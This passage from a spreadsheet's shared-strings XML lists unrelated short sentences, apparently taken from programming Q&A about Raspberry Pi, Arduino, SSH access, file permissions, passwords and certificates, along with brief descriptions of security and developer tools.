    <t>For some reason, the MAC address that my WiFi shield was supposed to use isn't what it actually uses.</t>
  </si>
  <si>
    <t>That would be an awesome hack!</t>
  </si>
  <si>
    <t>I don't think it's a permission problem.</t>
  </si>
  <si>
    <t>After that your android phone can connect to it
If you are sure they are in same network, you can do a network scan that is possible.</t>
  </si>
  <si>
    <t>Just a hack, but try this.</t>
  </si>
  <si>
    <t>The username and password values in your code need to be fixed.</t>
  </si>
  <si>
    <t>yes it could be a permission issue.</t>
  </si>
  <si>
    <t>When you do a scan for iBeacons on your Raspberry Pi, you need a script to parse out the iBeacon identifiers.</t>
  </si>
  <si>
    <t>You probably don't have the correct permissions.</t>
  </si>
  <si>
    <t>The error is:
So this seems to be a permissions issue with the file .</t>
  </si>
  <si>
    <t>runs as root before login, so you don't need or want sudo; it may be causing an error, hence nothing happening.</t>
  </si>
  <si>
    <t>This is all a hack.</t>
  </si>
  <si>
    <t>It is permissions problem.</t>
  </si>
  <si>
    <t>Or you could change the permissions of that device with sudo chmod 644 /dev/ttyACM0.</t>
  </si>
  <si>
    <t>It appears that the bits of the the values are getting corrupted.</t>
  </si>
  <si>
    <t>The issue was that I was connecting via SSH.</t>
  </si>
  <si>
    <t>No encoded necessary.</t>
  </si>
  <si>
    <t>It could also be a permissions problem.</t>
  </si>
  <si>
    <t>That is a dbus permissions problem.</t>
  </si>
  <si>
    <t>it seems to be permission issue.</t>
  </si>
  <si>
    <t>So I just didn't know that much about ssh or NSTask.</t>
  </si>
  <si>
    <t>Now run the Arduino IDE, if the issue is with permissions, then it's done.</t>
  </si>
  <si>
    <t>Hello i got the same problem
and i had to upgrade my wifi shield, and download the laste version from arduino  (1.0.6) and after that you will see that you will get access inside your lan to your wifi shield.</t>
  </si>
  <si>
    <t>Your wpa_supplicant.conf file should have psk="" in it, so that it indicates no password.</t>
  </si>
  <si>
    <t>If you do you can always hack that code.</t>
  </si>
  <si>
    <t>Most probably file system was corrupted.</t>
  </si>
  <si>
    <t>You certainly need bypass caps on the ATtiny, across VCC/GND.</t>
  </si>
  <si>
    <t>To do this, you simply have to access the Yun's root by doing ssh from the terminal.</t>
  </si>
  <si>
    <t>But be aware of security issues.</t>
  </si>
  <si>
    <t>You probably need to fix the access permissions to the I2C devices.</t>
  </si>
  <si>
    <t>To Debug
try this
Type "pwd" on your terminal.</t>
  </si>
  <si>
    <t>There is your permission problem.</t>
  </si>
  <si>
    <t>You can also if your openelec exposes nfs or samba or something else use something else to mount instead of sshfs.</t>
  </si>
  <si>
    <t>Also your Password seems wrong.</t>
  </si>
  <si>
    <t>The error you're seeing is a permissions issue.</t>
  </si>
  <si>
    <t>You could try
or change permission of your file:</t>
  </si>
  <si>
    <t>With each attempt Captcha becomes harder.</t>
  </si>
  <si>
    <t>It cannot be done through SSH</t>
  </si>
  <si>
    <t>Sounds like this could be being caused by a permissions error.</t>
  </si>
  <si>
    <t>You could hack it in like this :</t>
  </si>
  <si>
    <t>This happens because -lcrypto
precedes -lnetsnmp in your linkage.</t>
  </si>
  <si>
    <t>Also, you don't need to use an interrupt for that, but then you'd need some edge-detection algorithm.</t>
  </si>
  <si>
    <t>For your "CGDCONT" command, you should perhaps specify the username and password.</t>
  </si>
  <si>
    <t>They are also configured with mDNS but I don't have mDNS on my Android phone so it didn't help me.</t>
  </si>
  <si>
    <t>You can use Windows.System.MemoryManager.AppMemoryUsageLimit to confirm your device.</t>
  </si>
  <si>
    <t>It's could be problem in server if you log into your FTP.</t>
  </si>
  <si>
    <t>You need to enter both PUK and PIN codes.</t>
  </si>
  <si>
    <t>From there you should be able to SSH into your pi.</t>
  </si>
  <si>
    <t>You would be better off doing this through ssh.</t>
  </si>
  <si>
    <t>When you connect over ssh to a raspberry pi you are greeted with a terminal.</t>
  </si>
  <si>
    <t>The problem was VPC access.</t>
  </si>
  <si>
    <t>Change the IP of lan adapter in your computer to something like 192.168.0.10 (So that both are on the same network)
After this you can use this ip 192.168.0.200  to ssh to Raspberry Pi using Putty.</t>
  </si>
  <si>
    <t>File permissions may also be a problem.</t>
  </si>
  <si>
    <t>You need to encode amqp username and password.</t>
  </si>
  <si>
    <t>They all seemed like nasty hacks.</t>
  </si>
  <si>
    <t>However, mode2 does not tell you if the decoding works.</t>
  </si>
  <si>
    <t>QT complains that it cannot decode png files.</t>
  </si>
  <si>
    <t>What exactly do you try to unlock?</t>
  </si>
  <si>
    <t>If the device is MFi, then you must go through the device manufacturer who owns the device protocol names you used.</t>
  </si>
  <si>
    <t>Now for the  it is a file system permission problem.</t>
  </si>
  <si>
    <t>And you are then using both, which corrupts the data.</t>
  </si>
  <si>
    <t>https://github.com/ms-iot/security/issues/29</t>
  </si>
  <si>
    <t>The is undoubtedly a permissions issue.</t>
  </si>
  <si>
    <t>Did you try force to set mysql password?</t>
  </si>
  <si>
    <t>So now you will be able to login both in phpmyadmin and in console through root password.</t>
  </si>
  <si>
    <t>That's why you have corrupted data only with String data.</t>
  </si>
  <si>
    <t>It's annoying there is no hardware ID available on Arduino devices.</t>
  </si>
  <si>
    <t>Here is a hacked up version of your code that I think should work.</t>
  </si>
  <si>
    <t>The issue is not with permissions.</t>
  </si>
  <si>
    <t>Changing the PHP encrypt method to aes-256-cbc should fix the problem..</t>
  </si>
  <si>
    <t>The issue could be the unix user id is different for user "www-data" for the 2 different systems.</t>
  </si>
  <si>
    <t>It could also be a permissions issue.</t>
  </si>
  <si>
    <t>if it is not worke then the boot loader got corrupted.</t>
  </si>
  <si>
    <t>via ssh or something similar.</t>
  </si>
  <si>
    <t>Keep Hacking.</t>
  </si>
  <si>
    <t>Another problem could be your permissions.</t>
  </si>
  <si>
    <t>And there is a hacked way.</t>
  </si>
  <si>
    <t>With this, you shouldn't require a firmware update just to change the password.</t>
  </si>
  <si>
    <t>Each device should have its own unique certificate.</t>
  </si>
  <si>
    <t>If you don't you will have a problem accessing the device.</t>
  </si>
  <si>
    <t>Since this is a security issue, it is not allowed.</t>
  </si>
  <si>
    <t>The simplest of these is probably ssh.</t>
  </si>
  <si>
    <t>It was because of my user name containing a character that could not be noticed by arduino.</t>
  </si>
  <si>
    <t>Consider also changing your permission on the file.</t>
  </si>
  <si>
    <t>During over the air activation a DevAddr is assigned to the device.</t>
  </si>
  <si>
    <t>Try this:
I just replaced  and Pwd with User and Password</t>
  </si>
  <si>
    <t>For UWP application you select the Universal Authentication is correct.</t>
  </si>
  <si>
    <t>If you have not changed these, the default username is pi and the password raspberry.</t>
  </si>
  <si>
    <t>But you can't use different passwords.</t>
  </si>
  <si>
    <t>Then
you are re-encoding with jpeg_encode().</t>
  </si>
  <si>
    <t>Having both the same name on the network, i thought there was some problem with SSH.</t>
  </si>
  <si>
    <t>via a login screen).</t>
  </si>
  <si>
    <t>You might have to adjust your permissions.</t>
  </si>
  <si>
    <t>Unique Device ID.</t>
  </si>
  <si>
    <t>usernames, passwords, etc.)</t>
  </si>
  <si>
    <t>Request the SFTP subsystem from an already connected SSH2 server.</t>
  </si>
  <si>
    <t>JSch is a pure Java implementation of SSH2.</t>
  </si>
  <si>
    <t>Oracle database error code ORA-00911: invalid character</t>
  </si>
  <si>
    <t>The DEBUG fake signal.</t>
  </si>
  <si>
    <t>This is useful for prompting for passwords.</t>
  </si>
  <si>
    <t>It is used for alphanumeric or numeric-only barcodes.</t>
  </si>
  <si>
    <t>Password hash simply provides a wrapper for crypt(), using BCRYPT.</t>
  </si>
  <si>
    <t>Goggles also works as a barcode / QR code scanner.</t>
  </si>
  <si>
    <t>What is Hack?</t>
  </si>
  <si>
    <t>If the user is not authenticated, the middleware will redirect the user to the login screen.</t>
  </si>
  <si>
    <t>And for Intel, how to spot which flavour of Intel syntax it is, like NASM vs. MASM/TASM.</t>
  </si>
  <si>
    <t>After $dsn comes the username and password.</t>
  </si>
  <si>
    <t>The Mozilla project, as leak detector.</t>
  </si>
  <si>
    <t>Hack n' slash.</t>
  </si>
  <si>
    <t>I can confirm the following works on a nearly 2 months old firmware from the  branch sending data to cloudmqtt.com:
Differences:
m:connect defines secure y/n and autoreconnect y/n explicitly.</t>
  </si>
  <si>
    <t>It is also common for some mail providers to block certain emails based on email attachment file types due to security issues.</t>
  </si>
  <si>
    <t>The port is blocked and nothing i can do to unblock it (yeah i alreday surfed the web for solutions and none of them worked, i swear the only thing that has worked it's formatting the Ubuntu and re-installing it, which wasn't any drama due to my little data stored).</t>
  </si>
  <si>
    <t>Problem is that now I want to save client certificate_id and client_id in same table to make a relation between them, but I could not get certificate_id and client_id in one lambda invokation.</t>
  </si>
  <si>
    <t>I guess, the best workaround could be, query the device for a network scan - then you count how many APs were found: if the antenna has been unplugged, you will not get any APs (or maybe only 1-2...)</t>
  </si>
  <si>
    <t>Check this for more information: Running X from The X Window User HOWTO
In general you always need a wrapper and you must run X with root, since it needs raw access to hardware devices.</t>
  </si>
  <si>
    <t>In the meanwhile because I do not managed the script to get working I had made a button to shutdown the system manually.</t>
  </si>
  <si>
    <t>ps: Private/3rd party libraries should be placed /lib folder.</t>
  </si>
  <si>
    <t>Am I supposed to take some additional steps to make it reliable.</t>
  </si>
  <si>
    <t>Cheat sheets are so named because they may be used by students without the instructor's knowledge to cheat on a test.</t>
  </si>
  <si>
    <t>I have installed tightVNC and I am able to log onto my Pi without a problem but I realized cannot share files between my PC and my Pi through TightVNC.</t>
  </si>
  <si>
    <t>The communication between the xbee modules is probably okay, as there should be a checksum involved to make sure the packets are not corrupted.</t>
  </si>
  <si>
    <t>However, while in background, iPhones switch the advertising to a shrinked mode that makes the packet unidentifiable.</t>
  </si>
  <si>
    <t>To fix the issue, you need to make your calls thread-safe by invoking.</t>
  </si>
  <si>
    <t>You'd better use strtol() which is much safer with valid digit character check.</t>
  </si>
  <si>
    <t>If the IoT Edge Security Manager is not running, you may try to check the config.yaml which is located in C:\ProgramData\iotedge folder.</t>
  </si>
  <si>
    <t>Firstly you need to register your application with Instagram, this will provide you with a unique client_id and client_secret which you would need to continue further in your development.</t>
  </si>
  <si>
    <t>After opening a terminal window, after 30s a token
is inserted.</t>
  </si>
  <si>
    <t>ICE (Interactive Connectivity Establishment) is a protocol used to choose the best path between two users (even with NAT or Firewall issues).</t>
  </si>
  <si>
    <t>So what is the best solution: sockets, or ssh?</t>
  </si>
  <si>
    <t>Things to check:
* is a card is inserted?</t>
  </si>
  <si>
    <t>I have to make 4 "guesses" (the password consists of 4 numbers).</t>
  </si>
  <si>
    <t>The mass_storage system is recognized and is bootable as expected, however when I try to SSH in, the connection hangs.</t>
  </si>
  <si>
    <t>and we are ending up with a corrupted file (full of zeroes) and and a .tmp file next to it.</t>
  </si>
  <si>
    <t>The credentials provided by the user are stored in a file using SPIFFS, used to check whether to start the board in AP_STA mode or STA mode only.</t>
  </si>
  <si>
    <t>I don't like the fact that my main login is sent by IFTTT.</t>
  </si>
  <si>
    <t>PHP is trying to access COM in windows on the hardware level, you'll need elevated permissions.</t>
  </si>
  <si>
    <t>By any chance any hack available to make it work in Core-OS?</t>
  </si>
  <si>
    <t>Make sure there aren't any issues with file permissions on Dropbox or API tokens.</t>
  </si>
  <si>
    <t>I would probably try to generate and hardcode a unique token in each arduino, put it on a sticker on the device and then ask the users to register their devices.</t>
  </si>
  <si>
    <t>Salt can be stored openly (next to the hashed value) as it is not a password, just makes the password  different.</t>
  </si>
  <si>
    <t>I made the credentials dead simple.</t>
  </si>
  <si>
    <t>If you reduce baud rate, your data from IMU can be corrupted.</t>
  </si>
  <si>
    <t>If you want to run an application with a visible window, there has to be a logged-in user.</t>
  </si>
  <si>
    <t>It is supposed to run on login on my raspberry pi, yet it just logs in in (as I'm using auto login) and then does nothing, i.e.</t>
  </si>
  <si>
    <t>If press to send data 1 it should show 00000001 and 00000000.</t>
  </si>
  <si>
    <t>The mqttClientId is a unique string that identifies this device.</t>
  </si>
  <si>
    <t>Then it apparently connects again and after trying to subscribe to device A's characteristics, I get a  command disallowed status and noble stalls.</t>
  </si>
  <si>
    <t>The procedure with Audacity is very similar to the example in the link below.</t>
  </si>
  <si>
    <t>I have used recently this fingerprint module.</t>
  </si>
  <si>
    <t>VIN is an abbreviation for Vehicle Identification Number</t>
  </si>
  <si>
    <t>It looks like it's working hard on building OpenSSL, V8, and crypto.</t>
  </si>
  <si>
    <t>Here, the RaspberryPi can be accessed via SSH and I want my friend to be able to access one specific directory.</t>
  </si>
  <si>
    <t>The only way to make the commands work again is to reset the WiFi connections on the camera.</t>
  </si>
  <si>
    <t>le "Arduino encryption library" for some examples; pick a key, then encrypt your data, and just  it... 
Let  us know how you make out!</t>
  </si>
  <si>
    <t>AWS Cognito (Officially Branded as Amazon Cognito) is a user Authentication and Authorization Service Provided by Amazon Web Services.</t>
  </si>
  <si>
    <t>Try enclosing the connect identifier in quote marks.</t>
  </si>
  <si>
    <t>Telephony API is for monitoring the basic phone information, such as the network type and connection state, plus utilities for manipulating phone number strings.</t>
  </si>
  <si>
    <t>Does anyone happen to know how to hide it?</t>
  </si>
  <si>
    <t>If the ip address change, I have to get a new certificates right?</t>
  </si>
  <si>
    <t>$newLine);
            $smtpResponse = fgets($smtpConnect, 4096);
            $logArray['authusername'] = "$smtpResponse";
            //send the password
            fputs($smtpConnect, base64_encode($password) .</t>
  </si>
  <si>
    <t>if we allows each device to generate a key pair for the service, it is hard for the server to control the access, right?</t>
  </si>
  <si>
    <t>I am trying to connect to my linux system through simple ssh and its not working.</t>
  </si>
  <si>
    <t>Is it possible to do this without rooting the phone?</t>
  </si>
  <si>
    <t>-- Edit 2 --
those are ssh logs in auth.log
tail -f /var/log/auth.log
And those logs didn't change before and after the failure !!!</t>
  </si>
  <si>
    <t>I want to be able to ssh the PI from the web-server.</t>
  </si>
  <si>
    <t>I have already seen a lot "Arduino codes", but that's not what I am looking for.</t>
  </si>
  <si>
    <t>The problem is, that both devices need TX Pin (2).</t>
  </si>
  <si>
    <t>However i don't know how to pass password authentication.</t>
  </si>
  <si>
    <t>I'm trying to retrieve raspberry pi unique id using php.</t>
  </si>
  <si>
    <t>I can't seem to get the monitor to be recognized by SDL.</t>
  </si>
  <si>
    <t>Or is the sensor already been hard coded?</t>
  </si>
  <si>
    <t>I have only tried character device driver in linux.</t>
  </si>
  <si>
    <t>This code is supposed to connect the databases and insert the user.</t>
  </si>
  <si>
    <t>This app should send a 1 or a 0 to the Arduino via Bluetooth, which will then lock or unlock the door.</t>
  </si>
  <si>
    <t>Strangely, if I try to access the pi via ssh (using PuTTY), I can login as the user "pi".</t>
  </si>
  <si>
    <t>Please provide me code to connect to my local wifi using SSID and password.</t>
  </si>
  <si>
    <t>Trap in case of an incorrect login attempt.</t>
  </si>
  <si>
    <t>The system boots nicely and I am able to SSH to it.</t>
  </si>
  <si>
    <t>The server ip-address is also correct as i'm using it to ssh into the Rpi..</t>
  </si>
  <si>
    <t>I assign a password to connect to  a remote device to a variable $password.</t>
  </si>
  <si>
    <t>I am working on getting an integration working between a hacked  reader to Arduino Uno to Raspberry Pi working.</t>
  </si>
  <si>
    <t>I have an Arduino Uno that will not - no matter what I've tried - get recognized by my computer.</t>
  </si>
  <si>
    <t>220 (vsFTPd 2.3.5)
Name (localhost:pi): pi
331 Please specify the password.</t>
  </si>
  <si>
    <t>some privacy issues?</t>
  </si>
  <si>
    <t>I really need that unique serial
Code:</t>
  </si>
  <si>
    <t>A key logger if you will, so no matter what i am doing if i press a key it will be picked up by my script.</t>
  </si>
  <si>
    <t>When I try to connect from the Excel Data Connection Wizard, I enter the server name of 192.168.100.230:3306 and the User Name: excelUser with Password: password123.</t>
  </si>
  <si>
    <t>It should be something like an Hardware ID to identify a device.</t>
  </si>
  <si>
    <t>Is there any issue in NodeMCU or ESP8266, which does not allow us to have 255.255.255.240 as netmask for AP?</t>
  </si>
  <si>
    <t>Also, the Android phone is not rooted, so maybe that's why.</t>
  </si>
  <si>
    <t>I have neither monitor nor keyboard, so I would like to setup my raspberry through SSH.</t>
  </si>
  <si>
    <t>My intention of this question is about the security problem.</t>
  </si>
  <si>
    <t>I have Hacked Tower SG90 for continuous rotation.</t>
  </si>
  <si>
    <t>The people using this won't know about using the terminal or SSH-ing in...</t>
  </si>
  <si>
    <t>I have tried to change the permissions of the port.</t>
  </si>
  <si>
    <t>Code for teensy :
Python code for Raspberry Pi :
Result :
Why data seem to be corrupted?</t>
  </si>
  <si>
    <t>So I run into a problem when I am trying to disarm the system.</t>
  </si>
  <si>
    <t>It's deployed to this folder:
Now when it runs, it has no file access rights.</t>
  </si>
  <si>
    <t>I have developed a code which detects human in Raspberrypi camera with OpenCV C++ interface.</t>
  </si>
  <si>
    <t>The second account will be admin that will have all permission and it will be use to all instalations and changes.</t>
  </si>
  <si>
    <t>Or, using the wrong shared access key?</t>
  </si>
  <si>
    <t>If someone suspects hardware, please let me know why.</t>
  </si>
  <si>
    <t>I currently have an arduino with a wifi shield, hooked up to a PIR-detector and a website.</t>
  </si>
  <si>
    <t>I also want to include a buzzer that buzzes when the password is wrong.</t>
  </si>
  <si>
    <t>So I am considering to have an HMAC based digest for the password.</t>
  </si>
  <si>
    <t>I am connected to the raspberry pi via ssh and can ping so i don't think it is a connection issue.</t>
  </si>
  <si>
    <t>But when I execute the script, it wants root password.</t>
  </si>
  <si>
    <t>I have tried to change permissions for USB directory, and still the same problem.</t>
  </si>
  <si>
    <t>I've attempted Detector d with d.c amongst others.</t>
  </si>
  <si>
    <t>My webpack config is much more complex, the hack might be there.</t>
  </si>
  <si>
    <t>This is often an indication that other memory is
  corrupt.</t>
  </si>
  <si>
    <t xml:space="preserve">
So I am trying to SSH into my rpi3 and take input from an Xbox 360 controller plugged into my PC.</t>
  </si>
  <si>
    <t>The relevant codes are:
The connection URL is:
ssl somehow cannot work.</t>
  </si>
  <si>
    <t>Set root password?</t>
  </si>
  <si>
    <t>Again, the problem is only on Spyder.</t>
  </si>
  <si>
    <t>Also, I forgot to say, the # key should, clear the entered code.</t>
  </si>
  <si>
    <t>Apparently, a login is involved.</t>
  </si>
  <si>
    <t>In all of the examples of this library, the pin is hard-coded.</t>
  </si>
  <si>
    <t>And when it reaches the last one, it even overwrites the "password".</t>
  </si>
  <si>
    <t>I want the Arduino to send the pos to the Android app then change a label to lock or unlocked accordingly.</t>
  </si>
  <si>
    <t>I am working on an android application to hook up raspberry pi's to a local wifi network sending them ssid and ssid password information over bluetooth from my android phone.</t>
  </si>
  <si>
    <t>For this I want to used gtkterm, but I don't have any screen in the moment and I want to know if can I can run gtkterm by ssh.</t>
  </si>
  <si>
    <t>Does anyone have an idea how I can protect the password of the wifi or maybe just delete the... "login-protocol" or something like that?</t>
  </si>
  <si>
    <t>I am creating a TCP server on raspberry pi so that i can control it from my android phone over WIFI.</t>
  </si>
  <si>
    <t>This is often an indication that other memory is corrupt.</t>
  </si>
  <si>
    <t>From what I understood and saw that your protected override bool ProcessCmdKey, basically you wanted to see if the key was an arrow key.</t>
  </si>
  <si>
    <t>(On your next connections, you will be able to connect to mysql without using sudo, with the command:
"
# mysql --user=root --password=yourmysqlpassword
Now..</t>
  </si>
  <si>
    <t>Otherwise the IP address is hardcoded.</t>
  </si>
  <si>
    <t>Anyways this feels like a hack and is not what one should have to do.</t>
  </si>
  <si>
    <t>So I get the original access violation again.</t>
  </si>
  <si>
    <t>We're working with SPI for the security and (apparently) support.</t>
  </si>
  <si>
    <t>This error is most likely due to an unknown or inactive certificate."</t>
  </si>
  <si>
    <t>I am trying to send this JSON packet to AWS IoT, but it is not recognized by AWS.</t>
  </si>
  <si>
    <t>since i have to transfer user password over it.</t>
  </si>
  <si>
    <t>What am I doing wrong while signing the device certificate?</t>
  </si>
  <si>
    <t>I also tried to use codes online, that are supposed to be working, i'm getting the same results.</t>
  </si>
  <si>
    <t>What is happening when I ssh into the device that is connecting it to the internet?</t>
  </si>
  <si>
    <t>This is why I looked into SSH into more detail but once again I have run into a problem.</t>
  </si>
  <si>
    <t>The keypad code is confirmed to work, and the variable lockVer does change from 0 to 1 in Python, just not in Arduino.</t>
  </si>
  <si>
    <t>I don't want to hack a solution?</t>
  </si>
  <si>
    <t>Here the problem is regarding security.</t>
  </si>
  <si>
    <t>The images aren't sensitive, so if anyone wants to take a look at what I've done, you can see the file here.</t>
  </si>
  <si>
    <t>However, it can only the last fingerprint which is assigned at last.</t>
  </si>
  <si>
    <t>But I cannot log-in on the device itself via keyboard attach to it.</t>
  </si>
  <si>
    <t>But The problem is I can't add logout/de-authentication in the code.</t>
  </si>
  <si>
    <t>It looks perfect for me, but I think there is a graceful way to reset cached certificates.</t>
  </si>
  <si>
    <t>I tried to invert the LED but nothing happened.</t>
  </si>
  <si>
    <t>Might be possible to fix by looking at groups and permissions for /dev/ttyUSBx.</t>
  </si>
  <si>
    <t>Have you verified the MAC address is correct?</t>
  </si>
  <si>
    <t>Enter you Raspberry Pi user name in the login-field and click Next again.</t>
  </si>
  <si>
    <t>Pressing a key is a KeyPress Event.</t>
  </si>
  <si>
    <t>SoftwareSerial should work, but in my experience, hardware serial is much more reliable.</t>
  </si>
  <si>
    <t>If your phone is not rooted, I don't think it could work.</t>
  </si>
  <si>
    <t>It seems that my problem was caused by some bugs in the firmware.</t>
  </si>
  <si>
    <t>Of course you need to enable debug symbols for your program to get most of it.</t>
  </si>
  <si>
    <t>You'll have to hack out your own solution.</t>
  </si>
  <si>
    <t>wifi is a python library for scanning and connecting to wifi networks on linux.</t>
  </si>
  <si>
    <t>When your board is out of RAM it causes Choreo input data to get overwritten and corrupted on the 32U4 side of your Yn.</t>
  </si>
  <si>
    <t>You can simply use  as there is a driver for the shutdown controller in the linux kernel.</t>
  </si>
  <si>
    <t>Another approach would be to use SSH i.e.</t>
  </si>
  <si>
    <t>Now you can be sure that you're connected to the right person.</t>
  </si>
  <si>
    <t>I found that userid "pi" is hard coded in PiPhi.py!</t>
  </si>
  <si>
    <t>So you need to change permissions on executed file.</t>
  </si>
  <si>
    <t>Conclusion
Difference between Galileo and Edison is 1 year of more research and technological advances by Intel.</t>
  </si>
  <si>
    <t>I got this same error, but my problem was that I wasn't running with elevated permissions.</t>
  </si>
  <si>
    <t>please input your passcode value.</t>
  </si>
  <si>
    <t>I ssh to the PI1 itself, this forces to add to know_hosts under .ssh.</t>
  </si>
  <si>
    <t>In a lot of case, flush isn't needed, but when two different devices have to communicate, it could unlock the comm'.</t>
  </si>
  <si>
    <t>Your device is not recognized by your computer.</t>
  </si>
  <si>
    <t>That way, when your public IP changes, you will still be able to connect.</t>
  </si>
  <si>
    <t>It was permission related issue.</t>
  </si>
  <si>
    <t>Did you generate the DeviceId and device key correctly using CreateDeviceIdentity tool?</t>
  </si>
  <si>
    <t>Since it uses SPI, there shouldn't be a hardware compatibility issue.</t>
  </si>
  <si>
    <t>Solved it , it just was a permission error
just added the bluetooth_admin permission and it worked !!</t>
  </si>
  <si>
    <t>Your problem are the root certificates.</t>
  </si>
  <si>
    <t>If it is supported, try to confirm your encode command (with filesink/fakesink) and decode comand (with videotestsrc)</t>
  </si>
  <si>
    <t>If you don't have a keyboard and monitor for your pi Use putty to ssh to to it over the network.</t>
  </si>
  <si>
    <t>For instance:
 for no username and password.</t>
  </si>
  <si>
    <t>Don't you have to configure hardware handshake?</t>
  </si>
  <si>
    <t>I added some extra code in a config file in the ssh folder that caused problems.</t>
  </si>
  <si>
    <t>msmble always no need to enter PIN code.</t>
  </si>
  <si>
    <t>So if you'd correct that directory's permissions, it should work.</t>
  </si>
  <si>
    <t>This is why you cannot log the key with raw_input() and I would not be surprised if Xorg is not working either.</t>
  </si>
  <si>
    <t>Try to connect to this address over ethernet using ssh.</t>
  </si>
  <si>
    <t>Due to File access permissions of UWP app.</t>
  </si>
  <si>
    <t>After RPi is connected to the network you can use IP scanner to scan for the IP of RPi to ssh to it.</t>
  </si>
  <si>
    <t>No dirty tricks here.</t>
  </si>
  <si>
    <t>or security (ssh port scanning, bruteforce attacks)...</t>
  </si>
  <si>
    <t>If the first fails, the second has no use as the WiFi card is not able to scan.</t>
  </si>
  <si>
    <t>What if using %0 variable or &amp;&amp; concatenation in the password string?</t>
  </si>
  <si>
    <t>You can use a headless browser like phantomjs, launched with nodejs to automate the navigation, input username/password</t>
  </si>
  <si>
    <t>sudo expects a password, but you didn't provide any hence the error.</t>
  </si>
  <si>
    <t>Try changing eth0:0 to eth1 in your /etc/network/interfaces file
Your code should look something like this:</t>
  </si>
  <si>
    <t>(massive security/legal issues).</t>
  </si>
  <si>
    <t>This document walks through send_confirmation_callback and receive_message_callback.</t>
  </si>
  <si>
    <t>After changing this back to native_password it all works as expected.</t>
  </si>
  <si>
    <t>You must to protect it due security.</t>
  </si>
  <si>
    <t>But even if you fix this, the implementation is kinda naive and not something that can be considered fullproof.</t>
  </si>
  <si>
    <t>The format of SAS token you use is wrong.</t>
  </si>
  <si>
    <t>There is no support for the hacked way.</t>
  </si>
  <si>
    <t>LOOK TRY TO OPEN SIM CODE PIN 
FOR ME CODE PIN IS 0000
AT+CPIN=0000
AFTER
AT+CCFC=1,3,"+4930xxxxxxxx",145,1,1</t>
  </si>
  <si>
    <t>Apparently there was a bug in the interface firmware.</t>
  </si>
  <si>
    <t>The DevEUI is sent unencrypted.</t>
  </si>
  <si>
    <t>By pressing the button we prove that the user has physical access to the bridge.'</t>
  </si>
  <si>
    <t>why You not uses the WiFi mac address as unique ID ?</t>
  </si>
  <si>
    <t>Suppose you use cognito user pool as your identity provider.</t>
  </si>
  <si>
    <t>But when the edge agent tried to pull it, it failed because it was not authorized.</t>
  </si>
  <si>
    <t>The solution is to change MY_UUID_INSECURE to 00001101-0000-1000-8000-00805F9B34FB, per How to connect to Raspberry pi with an android app over bluetooth</t>
  </si>
  <si>
    <t>In general, Android applications don't have the correct Linux permissions to access system file handles like this.</t>
  </si>
  <si>
    <t>But this is useless i think as it is hidden from the application unless it is running on a rooted device.</t>
  </si>
  <si>
    <t>Wapiti is a vulnerability scanner for web applications.</t>
  </si>
  <si>
    <t>nude.js is a JavaScript implementation of a nudity scanner.</t>
  </si>
  <si>
    <t>the hardware subsystems that allow systems to connect to a network.</t>
  </si>
  <si>
    <t>John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS.</t>
  </si>
  <si>
    <t>JaVers is a lightweight java library for auditing changes in your data.</t>
  </si>
  <si>
    <t>zxcvbn is a password strength estimator inspired by password crackers.</t>
  </si>
  <si>
    <t>It blocks ads and website trackers.</t>
  </si>
  <si>
    <t>The general form of a file or directory name that specifies a unique location in a file system.</t>
  </si>
  <si>
    <t>Business Intelligence Publisher - Oracle's reporting application.</t>
  </si>
  <si>
    <t>Code 39 is a variable length, discrete barcode symbology.</t>
  </si>
  <si>
    <t>Password encryption is the act of securing a password with another password.</t>
  </si>
  <si>
    <t>Invalid CSS may not be displayed or applied to the page.</t>
  </si>
  <si>
    <t>Token-based detectors.</t>
  </si>
  <si>
    <t>This information leak does not exist in Chrome and has been fixed in Firefox 41.</t>
  </si>
  <si>
    <t>MaxMind provides IP intelligence through the GeoIP brand.</t>
  </si>
  <si>
    <t>Use TOR network with SSH and friends.</t>
  </si>
  <si>
    <t>that is protected because of permission issues.</t>
  </si>
  <si>
    <t>Can some one with the privilege correct it.</t>
  </si>
  <si>
    <t>Description
John the Ripper is a fast password cracker, currently available for many flavors of Unix, Windows, DOS, BeOS, and OpenVMS.</t>
  </si>
  <si>
    <t>-Z, --selinux-user
Remove SELinux user assigned to the user's login from SELinux login mapping.</t>
  </si>
  <si>
    <t>LeakSanitizer (LSan) is a run-time memory leak detector, available since Clang 3.4 and GCC 4.9.</t>
  </si>
  <si>
    <t>What is JaVers
JaVers is a lightweight java library for auditing changes in your data.</t>
  </si>
  <si>
    <t>Provide your unique 6-character org ID and any logs you have.</t>
  </si>
  <si>
    <t>Tiger is currently maintained by the Research &amp; Development Laboratory (LRDE) at l'cole de l'Intelligence Informatique (EPITA).</t>
  </si>
  <si>
    <t>As a result of DES's fame, it has been targeted and probed by cryptanalysis for any weaknesses.</t>
  </si>
  <si>
    <t>Other edge detection algorithm includes Laplace &amp; Sobel.</t>
  </si>
  <si>
    <t>Send the code you've entered off to a pastebin.</t>
  </si>
  <si>
    <t>Each key must be unique within a database.</t>
  </si>
  <si>
    <t>Gravatar is a service, that stores unique user identifier pictures - "avatars".</t>
  </si>
  <si>
    <t>Hardware compatibility can refer to the compatibility of computer hardware components with a particular CPU architecture, bus, motherboard or operating system.</t>
  </si>
  <si>
    <t>A MAC address is a 48 bit identifier assigned to every device connected to a network.</t>
  </si>
  <si>
    <t>Friends Data includes permissions such as friends_about_me , friends_location, friends_checkins, friends_status and so on.</t>
  </si>
  <si>
    <t>these codes are the codes that supposed to do the trick but i think its not working.</t>
  </si>
  <si>
    <t>As you can see, below is where you enter the keys you got from Twitter in the last step.</t>
  </si>
  <si>
    <t>I am programming in python on a raspberry pi trying to create a security camera.</t>
  </si>
  <si>
    <t>I am running Mac OSX
There are many steps that I have already seen:
Change Permissions ?</t>
  </si>
  <si>
    <t>I have tried changing permissions on the python file and I already ran the modprobe input as well.</t>
  </si>
  <si>
    <t>I am running into an issue where my Arduino 101 device will not be discovered by a BLE scan.</t>
  </si>
  <si>
    <t>I successfully pulled this off using a certificate from Comodo.</t>
  </si>
  <si>
    <t>I have generated SSL certificate - .cer, .pem, .key files and password to key.</t>
  </si>
  <si>
    <t>I have a project doing face recognition with Python.</t>
  </si>
  <si>
    <t>I tried also a few other network scanners but the result is always the same.</t>
  </si>
  <si>
    <t>I am trying to create a barcode scanner from a usb camera for Raspberry Pi.</t>
  </si>
  <si>
    <t>I'm able to login with the default user ID and password to at https://localhost:9443/publisher (step 1 and 2).</t>
  </si>
  <si>
    <t>two problem i have from this option:
1. the network needs to be connected.</t>
  </si>
  <si>
